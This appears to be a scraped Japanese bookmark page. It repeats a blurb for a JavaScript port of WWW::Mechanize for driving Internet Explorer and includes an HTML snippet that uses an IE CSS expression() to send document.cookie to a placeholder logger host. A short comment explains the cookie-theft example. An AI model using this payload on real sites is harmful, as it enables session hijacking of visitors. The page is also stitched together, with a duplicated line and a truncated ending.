WWW::Mechanize for JavaScript WWW::MechanizeライクなIEの遠隔操作ライブラリです 公開 : 2006-07-12 License : BSD License ダウンロード mechanize.js mechanize.hta(使用例)
WWW::Mechanize for JavaScript WWW::MechanizeライクなIEの遠隔操作ライブラリです 公開 : 2006-07-12 License : BSD License ダウンロード mechanize.js mechanize.hta(使用例)
<html> <body> <style type="text/css"> h1 { background#:/*;*/ expression('url(http://commonevillogger.example.com/log.php'+document.cookie+')'); } </style> <h1>heading</h1> </body> </html>上記はCookieを悪意あるサイトに飛ばす例です。IEのみ対応。 (ちなみに、expressionを使っていてもcommonevillogger.example.comには、Cookieが1回しか飛びません。個人的には意外な感じです。expressionを使ってalertしたりするとブラクラっぽくなったり、あるいは、リロードを仕込んでサーバに負荷がかかっちゃった事故とかを知っているからです。AutoF5攻撃みたいな。) 閑
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く